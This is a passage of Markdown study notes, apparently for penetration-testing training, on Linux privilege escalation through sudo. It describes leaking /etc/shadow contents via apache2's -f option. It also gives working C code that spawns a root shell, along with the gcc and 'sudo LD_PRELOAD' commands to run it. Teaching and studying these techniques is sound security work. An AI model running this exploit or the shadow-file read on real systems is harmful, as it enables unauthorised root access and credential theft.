Prototype-0-0-1/Known-Cyber-Tools/Notes/Privilege Escalation/Notes.md

 Another alternative would be to use a script like LES (Linux Exploit Suggester) but remember that these tools can generate false positives (report a kernel vulnerability that does not affect the target system) or false negatives (not report any kernel vulnerabilities although the kernel is vulnerable).

 ## Sudo

+The sudo command, by default, allows you to run a program with root privileges.
+Any user can check its current situation related to root privileges using the "sudo -l" command.
+[GTFObins](https://gtfobins.github.io/) is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.

+### Leverage application functions

+    Some applications will not have a known exploit within this context.
+    Example, for apache2 server, we can use a "hack" to leak information leveraging a function of the application.
+As you can see below, Apache2 has an option that supports loading alternative configuration files (-f : specify an alternate ServerConfigFile).
+    Loading the /etc/shadow file using this option will result in an error message that includes the first line of the /etc/shadow file.

+### Leverage LD_PRELOAD

+On some systems, you may see the LD_PRELOAD environment option.
+LD_PRELOAD is a function that allows any program to use shared libraries.
+This [blog post](https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/) will give you an idea about the capabilities of LD_PRELOAD.
+If the "env_keep" option is enabled we can generate a shared library which will be loaded and executed before the program is run.
+Please note the LD_PRELOAD option will be ignored if the real user ID is different from the effective user ID.

+The steps of this privilege escalation vector can be summarized as follows;

+    Check for LD_PRELOAD (with the env_keep option) Write a simple C code compiled as a share object (.so extension) file Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

+The C code will simply spawn a root shell and can be written as follows;

+    #include <stdio.h>
+    #include <sys/types.h>
+    #include <stdlib.h>

+    void _init() {
+    unsetenv("LD_PRELOAD");
+    setgid(0);
+    setuid(0);
+    system("/bin/bash");
+    }

+The code can be saved & compiled using gcc into a shared object file using the following parameters(shell.c is the file name of the above .c file):

+    gcc -fPIC -shared -o shell.so shell.c -nostartfiles

+We can now use this shared object file when launching any program our user can run with sudo.
+In the example case, Apache2, find, or almost any of the programs we can run with sudo can be used. (i.e. found via the sudo -l command)

+We need to run the program by specifying the LD_PRELOAD option, as follows;

+    sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

+## SUID